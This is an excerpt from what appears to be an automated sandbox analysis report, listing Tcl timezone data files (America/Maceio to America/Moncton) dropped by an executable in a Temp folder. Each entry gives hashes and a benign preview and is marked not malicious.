                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1507
                                                                                                                                                                                                                                                    Entropy (8bit):3.958253749053277
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQGEekqc+Ih+j+Dd+HO+W+iW+M+A+ph+h/1+ge5+Wt+x3+evIG+M+w+T+v+F+w+m:5NP+Ih+j+R+u+W+iW+M+A+r+hN+gU+Wp
                                                                                                                                                                                                                                                    MD5:9823A3BC9616E044820930E13097868D
                                                                                                                                                                                                                                                    SHA1:F672D334FC77CC693FD358E9D5D9F498DD5675DA
                                                                                                                                                                                                                                                    SHA-256:ACF6164AF86348F33ABB16E0961EF5291EF8DFEB23524CCDD2DB021A2BF5DE8F
                                                                                                                                                                                                                                                    SHA-512:BA9B86318C714DA49CC957C65B24257C65185BBCB5BCDC017D918E563711770151D9DA69B5CC8D06F8290F844B396ED4A5416BD5247A8BF772D287D1E292EE4B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Maceio) {. {-9223372036854775808 -8572 0 LMT}. {-1767217028 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -7200

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Managua

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):590
                                                                                                                                                                                                                                                    Entropy (8bit):4.233264210289004
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp5290znTsmdHOYPprva6/wLAyM/uFn/V8/uFn/3Y/oA2P/RASx/uFn/G/uFn/M:cQGnoeOshRIpMSn/V8Sn/3YVgJvxSn/6
                                                                                                                                                                                                                                                    MD5:6BF9AB156020E7AC62F93F561B314CB8
                                                                                                                                                                                                                                                    SHA1:7484A57EADCFD870490395BB4D6865A2E024B791
                                                                                                                                                                                                                                                    SHA-256:D45B4690B43C46A7CD8001F8AE950CD6C0FF7B01CD5B3623E3DD92C62FD5E473
                                                                                                                                                                                                                                                    SHA-512:CF02E62650679D8E2D58D0D70DE2322CAAA6508AF4FF7A60E415AA8AA3A9D26D1A191CFAE986ACAF0AEF1DFC4C2E34F9A5B6EDC2018E0B7E9000917D429FB587
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Managua) {. {-9223372036854775808 -20708 0 LMT}. {-2524500892 -20712 0 MMT}. {-1121105688 -21600 0 CST}. {105084000 -18000 0 EST}. {161758800 -21600 0 CST}. {290584800 -18000 1 CDT}. {299134800 -21600 0 CST}. {322034400 -18000 1 CDT}. {330584400 -21600 0 CST}. {694260000 -18000 0 EST}. {717310800 -21600 0 CST}. {725868000 -18000 0 EST}. {852094800 -21600 0 CST}. {1113112800 -18000 1 CDT}. {1128229200 -21600 0 CST}. {1146384000 -18000 1 CDT}. {1159682400 -21600 0 CST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Manaus

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1142
                                                                                                                                                                                                                                                    Entropy (8bit):4.001810227798472
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQGnveIo6Skl7s/oySklTs/oiSklP/otHSkl8/oNOSkll/osSklGo/ooSklR/o9/:5/6SklVySklTpiSklo5Skl5oSklOsSk6
                                                                                                                                                                                                                                                    MD5:63089A24AA65FCBAC0EC0FBDFAA1499E
                                                                                                                                                                                                                                                    SHA1:5798A49922AD78C2097E5C6448699D8DB309646A
                                                                                                                                                                                                                                                    SHA-256:7C891305E72EDFCDCFDBEBDB818F4594C87A9D1CFEAE03E656AEFEDD0914D201
                                                                                                                                                                                                                                                    SHA-512:71182C327086BF7B9D4F832282D62EE22710230938D85155219FEFFCEAC7D1F76055A9CDCB6FB23A47C5AACFFC97056EB66E4BAEAD6DBA3075C80074927D21E0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Manaus) {. {-9223372036854775808 -14404 0 LMT}. {-1767211196 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}. {5

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Marigot

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):202
                                                                                                                                                                                                                                                    Entropy (8bit):4.890561068654966
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290zzJ/90e/:MBaIMY9QpI290zzN90O
                                                                                                                                                                                                                                                    MD5:3340CD9706ECBB2C6BCB16F1D75C5428
                                                                                                                                                                                                                                                    SHA1:FE230B53F0DCCE15C14C91F43796E46DA5C1A2CE
                                                                                                                                                                                                                                                    SHA-256:BC2F908758F074D593C033F7B1C7D7B4F81618A4ED46E7907CD434E0CCFEE9F4
                                                                                                                                                                                                                                                    SHA-512:016AB54B9E99600A296D99A036A555BB79E3C5FDB0F1BEB516AFFE17B7763D864CB076B9C2D95547ED44BA2F6FC372CDFF25708C5423E1CF643AB6F0AA78E0E3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Marigot) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Martinique

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):242
                                                                                                                                                                                                                                                    Entropy (8bit):4.7982301339896285
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X5290zlJm2OHfueP9dMQR5OfT/VVFUFkCFeR/r:MBp5290znmdHfnP9dMQR5Gb/uFkCFO/r
                                                                                                                                                                                                                                                    MD5:2F7A1415403071E5D2E545C1DAA96A15
                                                                                                                                                                                                                                                    SHA1:6A8FB2ABAD2B2D25AF569624C6C9AAE9821EF70B
                                                                                                                                                                                                                                                    SHA-256:40F3C68A518F294062AC3DD5361BB9884308E1C490EF11D2CFDC93CB219C3D26
                                                                                                                                                                                                                                                    SHA-512:3E4D94AB6A46E6C3BB97304F3A5596A06041C0E0935CC840F4A6EB56D0892778F853959A742C5B832CD8F07AB9B74539C45599F22C080577503B2E34B6CE28C5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Martinique) {. {-9223372036854775808 -14660 0 LMT}. {-2524506940 -14660 0 FFMT}. {-1851537340 -14400 0 AST}. {323841600 -10800 1 ADT}. {338958000 -14400 0 AST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Matamoros

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6526
                                                                                                                                                                                                                                                    Entropy (8bit):3.7582526108760064
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:t+vN41+z6stuNEsRZLbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsr2:taN41+z6stuNEsRZLbXwDTIRqfh57TlE
                                                                                                                                                                                                                                                    MD5:2BBAA150389EAAE284D905A159A61167
                                                                                                                                                                                                                                                    SHA1:0001B50C25FC0CDF015A60150963AAF895EEDEEF
                                                                                                                                                                                                                                                    SHA-256:A7966B95DBE643291FB68E228B60E2DC780F8155E064D96B670C8290F104E4AB
                                                                                                                                                                                                                                                    SHA-512:87CE18E7E4C2C59A953CD47005EF406F4923730459996B1BF09B04FFD9CD5F963A9E50299ECCDBF4B24C565412B706B1ABC39890D659E6F409F1BA50308E57F9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Matamoros) {. {-9223372036854775808 -24000 0 LMT}. {-1514743200 -21600 0 CST}. {568015200 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {599637600 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 C

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Mazatlan

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6619
                                                                                                                                                                                                                                                    Entropy (8bit):3.788952004807415
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:W7ezBT8tRkfKxhzY720zaOXmlITHjLc1cb:X8tRkfKv+2wB9h
                                                                                                                                                                                                                                                    MD5:4D63766E65BF3E772CCEC2D6DB3E2D3E
                                                                                                                                                                                                                                                    SHA1:DB541D2908159C7EF98F912D8DBC36755FFD13F3
                                                                                                                                                                                                                                                    SHA-256:81CEA4A397AF6190FD250325CF513976B3508209AE3A88FDFD55490A5016A36D
                                                                                                                                                                                                                                                    SHA-512:DFAF1B3547B1B1B78B33F1F0F5E9624C693492687EC5D060FC4C6CBE2AFBB61B2E9B618133636DD62364D28B2450F741561AADFDE7B811F579BBC7247343A041
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Mazatlan) {. {-9223372036854775808 -25540 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -21600

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Mendoza

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):214
                                                                                                                                                                                                                                                    Entropy (8bit):4.76389929825594
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7/MBVAIgp/Ma290zpH+90/MI:MBaIMY/Mcp/Ma290zpe90/MI
                                                                                                                                                                                                                                                    MD5:A6EFD8F443D4CB54A5FB238D4D975808
                                                                                                                                                                                                                                                    SHA1:8F25C6C0EA9D73DC8D1964C4A28A4E2E783880CC
                                                                                                                                                                                                                                                    SHA-256:39B34B406339F06A8D187F8CCC1B6BF2550E49329F7DCE223619190F560E75F8
                                                                                                                                                                                                                                                    SHA-512:4B5D48472D56AF19B29AD2377573CC8CB3ED9EF1AF53C00C907B6576FA852EA3D1E9F9B3A78A280DC44F8ADBE5B81D6AEC2609BE08FFA08507CD0F4139878F46
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Mendoza)]} {. LoadTimeZoneFile America/Argentina/Mendoza.}.set TZData(:America/Mendoza) $TZData(:America/Argentina/Mendoza).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Menominee

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8136
                                                                                                                                                                                                                                                    Entropy (8bit):3.7460641906933345
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:oXxj07ffkeTzZSJw5/9/yuvQ+hcrD57X0N41+IestuNEbYkzbXwDTIRqfhXbdXvC:oXxj07ffNTzZSJw5/9/yuvQ6crD57X0w
                                                                                                                                                                                                                                                    MD5:0D0DC4A816CDAE4707CDF4DF51A18D30
                                                                                                                                                                                                                                                    SHA1:7ED2835AA8F723B958A6631092019A779554CADE
                                                                                                                                                                                                                                                    SHA-256:3C659C1EAC7848BBE8DF00F857F8F81D2F64B56BD1CEF3495641C53C007434FA
                                                                                                                                                                                                                                                    SHA-512:930F2FDC2C1EAE4106F9B37A16BCBBAF618A2CCBBA98C712E8215555CF09B9303D71842DEC38EFAF930DB71E14E8208B14E41E10B54EF98335E01435D0FC3518
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Menominee) {. {-9223372036854775808 -21027 0 LMT}. {-2659759773 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-116438400 -18000 1 CDT}. {-100112400 -21600 0 CST}. {-21484800 -18000 0 EST}. {104914800 -21600 0 CST}. {104918400 -18000 1 CDT}. {120639600 -21600 0 CST}. {126691200 -18000 1 CDT}. {152089200 -21600 0 CST}. {162374400 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 CST}. {262771200 -18000 1 CDT}. {278492400 -21600 0 CST}. {294220800 -18000 1 CDT}. {309942000 -21600 0 CST}. {325670400 -18000 1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Merida

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6435
                                                                                                                                                                                                                                                    Entropy (8bit):3.757504464563519
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:gN41+z6stuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOVEmR:gN41+z6stuNEsRZjWqZL/1dCYDDCxyHo
                                                                                                                                                                                                                                                    MD5:A7C5CFE3FA08D4CEDF6324457EA5766E
                                                                                                                                                                                                                                                    SHA1:83BB96398C0B1B34771940C8F7A19CB78C5EF72F
                                                                                                                                                                                                                                                    SHA-256:A1D7DE7285DC78ADDE1B0A04E05DA44D0D46D4696F67A682D0D28313A53825FE
                                                                                                                                                                                                                                                    SHA-512:092DD7CEF6A5861472965E082171937EEDCFB3AE1821E3C88AA1BDFAB1EC48F765CAC497E3E5C78C19653C78B087C7CE28A8AB76F9073558963234901EF4B4A4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Merida) {. {-9223372036854775808 -21508 0 LMT}. {-1514743200 -21600 0 CST}. {377935200 -18000 0 EST}. {407653200 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 CDT}. {1225004400 -21600 0 CST}. {1238918400 -18000 1 CD

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Metlakatla

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1223
                                                                                                                                                                                                                                                    Entropy (8bit):4.043351581198227
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQG6JeNYesEmlJ14Rs/a4H/YDmD1bSSs8TZZTnEjnz4pUV/NbQKmScg/kg6TgJTQ:5OYvP06z9N1e5udJ
                                                                                                                                                                                                                                                    MD5:B33AB48A35A25DD80C13604A13869520
                                                                                                                                                                                                                                                    SHA1:CD62F2EBD1BA4197E7D2923E9B984EB862EFA46E
                                                                                                                                                                                                                                                    SHA-256:DDF7AD896370189E67E9CA9017661541181C1901F56DC4954015175412C506CA
                                                                                                                                                                                                                                                    SHA-512:99C3F043A921C1E34E1A9CC8D7D5B0D043BBEAC565F3E55E7618C06C1686CF00BF9E2CB4D9AB3C0625E9E41DD2C0B40706D4FA106F006A710B117C7A86075FD9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Metlakatla) {. {-9223372036854775808 54822 0 LMT}. {-3225366822 -31578 0 LMT}. {-2188955622 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Mexico_City

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6807
                                                                                                                                                                                                                                                    Entropy (8bit):3.761365047166545
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:VeE7nN41+zKstuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sQ:VeE7nN41+zKstuNEsRZjWqZL/1dCYDDK
                                                                                                                                                                                                                                                    MD5:C675DA8A44A9841C417C585C2661EF13
                                                                                                                                                                                                                                                    SHA1:147DDE5DD00E520DA889AC9931088E6232CE6FEA
                                                                                                                                                                                                                                                    SHA-256:82B9AAD03408A9DFC0B6361EC923FEAEF97DBB4B3129B772B902B9DAE345D63E
                                                                                                                                                                                                                                                    SHA-512:00615A5EC0D08BABF009C3CAAF3D631B1F4E2E4324E91B0F29ADD7E61B51C80D5D495D20BD131A9370C3005B2E510C8A4E4869A5032D82BC33C875E909CDE086
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Mexico_City) {. {-9223372036854775808 -23796 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-975261600 -18000 1 CDT}. {-963169200 -21600 0 CST}. {-917114400 -18000 1 CDT}. {-907354800 -21600 0 CST}. {-821901600 -18000 1 CWT}. {-810068400 -21600 0 CST}. {-627501600 -18000 1 CDT}. {-612990000 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001836800 -21600 0 CST}. {1014184800 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Miquelon

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7074
                                                                                                                                                                                                                                                    Entropy (8bit):3.8399423763277087
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:FtGlRdJVKU7c7q5lynu9b4HwXz+SqgNyz0T2CKm8qHmqpiq21PjgDCghEpW12YXq:ExKZ651i
                                                                                                                                                                                                                                                    MD5:3BE359FC305B39DE06AEBC7E1DA63F42
                                                                                                                                                                                                                                                    SHA1:1F4DD606C5CC277DACC7678E8B82A9C8E8ACDD4F
                                                                                                                                                                                                                                                    SHA-256:BB8E349500B467FE8F2670AF36F8237C12B513CF2832005E70281309C3AA057A
                                                                                                                                                                                                                                                    SHA-512:85017DFFF1BDE833737AF09673CB9001E7EFD10B7C7E83659D425150E11BD1FA56DF8DEC921DB279A853C0379CC15E720BFBB109A8100A3B3D1B4030128BB34A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Miquelon) {. {-9223372036854775808 -13480 0 LMT}. {-1850328920 -14400 0 AST}. {326001600 -10800 0 PMST}. {536468400 -10800 0 PMST}. {544597200 -7200 1 PMDT}. {562132800 -10800 0 PMST}. {576046800 -7200 1 PMDT}. {594187200 -10800 0 PMST}. {607496400 -7200 1 PMDT}. {625636800 -10800 0 PMST}. {638946000 -7200 1 PMDT}. {657086400 -10800 0 PMST}. {671000400 -7200 1 PMDT}. {688536000 -10800 0 PMST}. {702450000 -7200 1 PMDT}. {719985600 -10800 0 PMST}. {733899600 -7200 1 PMDT}. {752040000 -10800 0 PMST}. {765349200 -7200 1 PMDT}. {783489600 -10800 0 PMST}. {796798800 -7200 1 PMDT}. {814939200 -10800 0 PMST}. {828853200 -7200 1 PMDT}. {846388800 -10800 0 PMST}. {860302800 -7200 1 PMDT}. {877838400 -10800 0 PMST}. {891752400 -7200 1 PMDT}. {909288000 -10800 0 PMST}. {923202000 -7200 1 PMDT}. {941342400 -10800 0 PMST}. {954651600 -7200 1 PM

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Moncton

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10165
                                                                                                                                                                                                                                                    Entropy (8bit):3.73501024949866
                                                                                                                                                                                                                                                    Encrypted:false
